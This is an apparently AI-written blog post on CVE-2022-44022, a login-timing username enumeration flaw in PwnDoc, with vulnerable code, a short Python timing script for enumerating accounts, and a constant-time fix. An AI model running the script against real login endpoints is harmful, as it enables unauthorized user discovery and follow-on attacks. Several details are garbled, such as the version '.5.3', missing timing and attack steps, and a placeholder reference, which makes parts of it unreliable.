PwnDoc is a popular collaborative pentest reporting platform, widely used for automating report generation and sharing. However, up to version .5.3, PwnDoc contained a subtle yet dangerous security flaw: an attacker could remotely discover valid usernames by analyzing response times during authentication. In this post, we'll break down how this vulnerability works, show some code snippets, discuss real-world exploitation, and provide links to the original advisories.
CVE-2022-44022 identifies a vulnerability in PwnDoc up to version .5.3.
- Issue: Login response timings allow remote attackers to detect which usernames exist on the system.
- Impact: Enables information gathering (user enumeration), paving the way for brute force, phishing, or targeted attacks.
How the Vulnerability Works
When you attempt to log in, PwnDoc processes your username and password. If your username is wrong, it quickly rejects you. But with a valid username, it takes a bit longer: the server goes on to check the password too.
Sounds harmless, but here’s the catch:
A difference in response times lets an attacker figure out which usernames are valid—even without knowing any password.
Valid Username (but wrong password): Slower reject (e.g., 350ms).
This measurable delay gives the attacker a clear signal.
Here's a simplified Node.js/JavaScript logic similar to PwnDoc’s backend
async function login(username, password) {
const user = await User.findOne({ username: username });
if (!user) {
// Username not found: immediately return error
return { success: false, message: "Invalid credentials" };
}
// Username found: now check the password
const isMatch = await bcrypt.compare(password, user.password);
if (!isMatch) {
// Slower because password hash comparison takes time
return { success: false, message: "Invalid credentials" };
}
// Successful login
return { success: true, token: generateToken(user) };
}
Problem: The timing differs based on whether the username exists.
Measure the response time again.
If admin exists, PwnDoc will take noticeably longer.
Here’s a realistic script to test usernames
import requests
import time
url = "https://<pwndoc-url>/api/auth/login";
usernames = ["admin", "administrator", "test", "reporter", "user1"]
responses = {}
for uname in usernames:
data = {"username": uname, "password": "RandomBadPass123!"}
start = time.time()
r = requests.post(url, json=data)
duration = time.time() - start
responses[uname] = duration
print(f"Username: {uname} - Response Time: {duration:.3f}s")
print("\nLikely valid usernames (longer time):")
threshold = sum(responses.values())/len(responses) + .1
for uname, duration in responses.items():
if duration > threshold:
print(uname)
This will print out usernames that have a longer response time, indicating that they are probably present in the system.
Mitigation
The fix for this class of bugs is simple in theory:
Here’s how you can “equalize” timing
async function login(username, password) {
const fakeHash = "$2b$10$saltsaltsaltsaltsaltsaltpjl.e1wFMSNAWx6t4OZnTIpn6UBqB3e";
const user = await User.findOne({ username: username });
// Compare password anyway, even for invalid usernames
const hash = user ? user.password : fakeHash;
const isMatch = await bcrypt.compare(password, hash);
if (!user || !isMatch) {
return { success: false, message: "Invalid credentials" };
}
return { success: true, token: generateToken(user) };
}
This way, all attempts take the same duration, and timing attacks won’t work.
## References / Further Reading
- Original CVE Entry (MITRE)
- Github Advisory Database *(placeholder, replace with correct link if available)*
- NIST NVD Entry
- PwnDoc GitHub Repository
- OWASP: Authentication Timing Attacks
Final Thoughts
CVE-2022-44022 is a great reminder: even tiny leaks through timing can have big security consequences. Always keep response timing equal for authentication endpoints. If you manage a PwnDoc instance, update ASAP, and consider testing your own login flows for similar leaks.
*Stay safe, and keep your pentest tools locked down!*
*Exclusive content by AI | Please don’t use this information for unauthorized testing or exploitation!*
Timeline
Published on: 10/30/2022 00:15:00 UTC
Last modified on: 11/01/2022 12:57:00 UTC